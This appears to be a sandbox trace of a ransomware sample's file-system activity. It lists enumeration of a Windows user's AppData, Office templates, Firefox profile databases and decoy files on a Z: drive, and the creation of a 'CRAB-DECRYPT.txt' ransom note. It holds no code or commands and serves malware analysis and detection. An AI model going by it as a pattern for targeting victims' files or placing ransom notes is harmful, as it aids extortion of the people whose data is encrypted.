Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\key3.db desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\minidumps\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\permissions.sqlite desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\places.sqlite desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\EdkUgdunNhUsDwiV5VL.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Pipe Anonymous read pipe size = 0 True 1
Create Pipe Anonymous read pipe size = 0 True 1
Get Info C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe type = size True 1
Get Info C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\$IPEWI8I.TMP type = file_attributes True 1
Get Info Z:\ggNuzUYFd.swf type = file_attributes True 1
Get Info Z:\QbYwYSoMD3beKw.mkv type = file_attributes True 1
Get Info C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\settings.ini type = file_attributes True 1
Get Info C:\Users\Default\NTUSER.DAT.LOG1 type = file_attributes True 1
Get Info C:\Users\Default\NTUSER.DAT.LOG2 type = file_attributes True 1
Get Info C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf type = file_attributes True 1
Get Info Z:\fUHonlL.swf type = file_attributes True 1
Get Info C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms type = file_attributes True 1
Get Info C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\27YjI_tg_wmDvK-.gif type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\2KxNzGrrl.doc type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\57VfXi.wav type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\7y338WW30Khw_Kvdj.bmp type = file_attributes True 1
Get Info Z:\brgVKnP3IVGPPX.pps type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\80nauBl1bcqQ.mp3 type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\9HQb6.gif type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\aD456ynae.png type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl type = file_attributes True 1
Get Info Z:\PCEJlbmpwZ68QNsWdvWo.mp4 type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_Acrobat12_Reader_3980e2e3-09b5-4737-a657-22675b06a39a_03db394c-1477-45d1-895c-00e42db7e723_0.rdy type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg type = file_attributes True 1
Get Info Z:\zP0nKisr4oLuznV8Y.pptx type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\BC4CK.mp3 type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Cx 2hVTJNEPKc.mp3 type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\d 3OIHehyy3Jgx.mp4 type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Dz28gHwyj9-jVurMnBQV.ots type = file_attributes True 1
Get Info Z:\DR2HdhXM7A.xls type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\fezrNJYET8dXBnLxa.mp4 type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\FKoQ.odt type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\gfLne6ecA1jmfG6m8.mkv type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Im-Xi-TXJUjXU8gwjeAN.avi type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\iVmnctwjmS.swf type = file_attributes True 1
Get Info Z:\0uoW8iDiO9C0q.jpg type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\je8O8Wzi8buOk7-5Nx6.m4a type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\KdoskM.avi type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl type = file_attributes True 1
Get Info Z:\ctwtFUQdhyq9B0.flv type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL type = file_attributes True 1
Get Info Z:\wwWTiMqjx6hY7AqmcQRC.rtf type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL type = file_attributes True 1
Get Info Z:\ZluEZ8VfU.ppt type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL type = file_attributes True 1
Get Info Z:\AeKHMJrNCDYUq.ots type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx type = file_attributes True 1
Get Info Z:\usc0a0c3QarsfV.docx type = file_attributes True 1
Get Info Z:\Ft1MOn1CIc.pdf type = file_attributes True 1
Get Info Z:\1taL0c72JXkGj.docx type = file_attributes True 1
Get Info Z:\EmullYJgNTq8y.odt type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\MSO1033.acl type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\con2.LNK type = file_attributes True 1
Get Info Z:\fJJNxlZPFcIOL7N8L.pps type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\index.dat type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.srs type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.xml type = file_attributes True 1
Get Info Z:\hjOwYAb7YQ2odlEyn.avi type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm type = file_attributes True 1
Get Info Z:\ZcRis.ppt type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02836342[[fn=Ion]].thmx type = file_attributes True 1
Get Info Z:\pEtobMGPdVk4C2adw.csv type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02892315[[fn=Wisp]].thmx type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900688[[fn=Facet]].thmx type = file_attributes True 1
Get Info Z:\sEi0K8sZnqEl5.avi type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900771[[fn=Slice]].thmx type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090430[[fn=Banded]].thmx type = file_attributes True 1
Get Info Z:\oXr639hN3x86Bhd.avi type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx type = file_attributes True 1
Get Info Z:\XmnJxoBkEp9WD4cyN.gif type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457444[[fn=Basis]].thmx type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457464[[fn=Dividend]].thmx type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457475[[fn=Frame]].thmx type = file_attributes True 1
Get Info Z:\KtzEQVEZQWFLdAY3Qn.odt type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx type = file_attributes True 1
Get Info Z:\sbZAE.wav type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457491[[fn=Metropolitan]].thmx type = file_attributes True 1
Get Info Z:\ukO9D2qllnBsxnQ.pptx type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457496[[fn=Parallax]].thmx type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457503[[fn=Quotable]].thmx type = file_attributes True 1
Get Info Z:\UsVrBfwU9tuC5KFqX2K.swf type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx type = file_attributes True 1
Get Info Z:\gr07JV38A.gif type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457515[[fn=View]].thmx type = file_attributes True 1
Get Info Z:\BhX74jJaOIdhyhcSe5G9.xlsx type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033917[[fn=Berlin]].thmx type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx type = file_attributes True 1
Get Info Z:\xQ6SLR9y03J4ITfu7P.flv type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx type = file_attributes True 1
Get Info Z:\4z3uag.rtf type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx type = file_attributes True 1
Get Info Z:\BokNObz8UcZzwf.avi type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033927[[fn=Main Event]].thmx type = file_attributes True 1
Get Info Z:\rYZw8NqY13.ots type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033929[[fn=Slate]].thmx type = file_attributes True 1
Get Info Z:\Kn7qhmeLrMy5AdqLU92.xlsx type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033937[[fn=Vapor Trail]].thmx type = file_attributes True 1
Get Info Z:\sDKhau.doc type = file_attributes True 1
Get Info Z:\8qGeXH1kIXTzNAwh1.pptx type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001103[[fn=Headlines]].thmx type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001104[[fn=Feathered]].thmx type = file_attributes True 1
Get Info Z:\991tuWIWnfwOaO.rtf type = file_attributes True 1
Get Info Z:\LOFKJdnEn4MzMXm.rtf type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001105[[fn=Crop]].thmx type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001114[[fn=Gallery]].thmx type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001115[[fn=Parcel]].thmx type = file_attributes True 1
Get Info Z:\RH3IiU0yMrDFNR6DKs.pdf type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM16401371[[fn=Atlas]].thmx type = file_attributes True 1
Get Info Z:\iWJTz4KEmPveSMxUQ8.bmp type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328884[[fn=architecture]].glox type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328893[[fn=BracketList]].glox type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328905[[fn=Chevron Accent]].glox type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328908[[fn=Circle Process]].glox type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328916[[fn=Converging Text]].glox type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328919[[fn=Hexagon Radial]].glox type = file_attributes True 1
Get Info Z:\qU7Og9CaR8xuh.rtf type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328925[[fn=Interconnected Block Process]].glox type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328932[[fn=Picture Frame]].glox type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328935[[fn=Picture Organization Chart]].glox type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328940[[fn=Radial Picture List]].glox type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328951[[fn=Tabbed Arc]].glox type = file_attributes True 1
Get Info Z:\lEAREuPn69.mp4 type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328972[[fn=Tab List]].glox type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328975[[fn=Theme Picture Accent]].glox type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328983[[fn=Theme Picture Alternating Accent]].glox type = file_attributes True 1
Get Info Z:\qnnrT9SEOOv4oMd88.jpg type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328986[[fn=Theme Picture Grid]].glox type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328990[[fn=Varying Width List]].glox type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328998[[fn=Rings]].glox type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851216[[fn=apasixtheditionofficeonline]].xsl type = file_attributes True 1
Get Info Z:\eCV9B6Keul.docx type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851217[[fn=chicago]].xsl type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851218[[fn=gb]].xsl type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851219[[fn=gostname]].xsl type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851220[[fn=gosttitle]].xsl type = file_attributes True 1
Get Info Z:\pWw3Texk6CwVcTz.odp type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851221[[fn=harvardanglia2008officeonline]].xsl type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851222[[fn=ieee2006officeonline]].xsl type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851223[[fn=iso690]].xsl type = file_attributes True 1
Get Info Z:\TkryzlAhWDjxy.avi type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851224[[fn=iso690nmerical]].xsl type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851225[[fn=mlaseventheditionofficeonline]].xsl type = file_attributes True 1
Get Info Z:\NXOcFmcZH0kfs1V2.xls type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851226[[fn=turabian]].xsl type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl type = file_attributes True 1
Get Info Z:\cxc1c8A9xEZm1pp.xlsx type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835231[[fn=Text Cover with TOC (Student Report Blue design)]].docx type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835232[[fn=Text Cover (Student Report Blue design)]].docx type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835264[[fn=Cover Page (Annual Report Red and Black design)]].docx type = file_attributes True 1
Get Info Z:\FsFwfuaCG.csv type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835265[[fn=Cover Page (Annual Report Timeless design)]].docx type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835266[[fn=Cover Letter (Chronological Resume Simple design)]].docx type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835267[[fn=Cover with Logo (Annual Report Red and Black design)]].docx type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835268[[fn=Photo Cover (Student Report Blue design)]].docx type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835269[[fn=Photo Cover with TOC (Student Report blue design)]].docx type = file_attributes True 1
Get Info Z:\1F9dzJR3Dq.wav type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835270[[fn=Photo Sidebar (Annual Report Red and Black design)]].docx type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835271[[fn=Sample Table (Annual Report Red and Black design)]].docx type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835272[[fn=Sample Table (Annual Report Timeless design)]].docx type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02836362[[fn=Cover letter (Resume Timeless Design)]].docx type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998158[[fn=Element]].dotx type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx type = file_attributes True 1
Get Info Z:\o4isx.png type = file_attributes True 1
Get Info Z:\2XzzHT1hfS0s9l.docx type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Normal.dotm type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Welcome to Word.dotx type = file_attributes True 1
Get Info Z:\m9asRMP8HoSL6.avi type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\addons.json type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\addonStartup.json.lz4 type = file_attributes True 1
Get Info Z:\PlmVZkn.csv type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\blocklist.xml type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\cert8.db type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\compatibility.ini type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\containers.json type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\content-prefs.sqlite type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\cookies.sqlite type = file_attributes True 1
Get Info Z:\D9xhD4Vtl9zeKaqi.mkv type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\1503651440860.2d520ad0-8005-4317-b4fd-571af846ed8d.new-profile.jsonlz4 type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\1503651441015.321b9820-ddf0-4472-8833-27c2104c93fa.main.jsonlz4 type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\1503651456011.5f95b583-d699-497d-975d-4dba64e21259.main.jsonlz4 type = file_attributes True 1
Get Info Z:\diCHxx1R37p96mJV.ppt type = file_attributes True 1
Get Info Z:\8KdP1zVgyza2WB4YuYBy.gif type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\session-state.json type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\state.json type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\extensions.json type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\favicons.sqlite type = file_attributes True 1
Get Info Z:\9HqwEbX7Ln7H.wav type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-gmpopenh264\1.6\gmpopenh264.info type = file_attributes True 1
Get Info Z:\9ZTbafp.mp3 type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\LICENSE.txt type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\manifest.json type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\widevinecdm.dll.lib type = file_attributes True 1
Get Info Z:\EdkUgdunNhUsDwiV5VL.xlsx type = file_attributes True 1
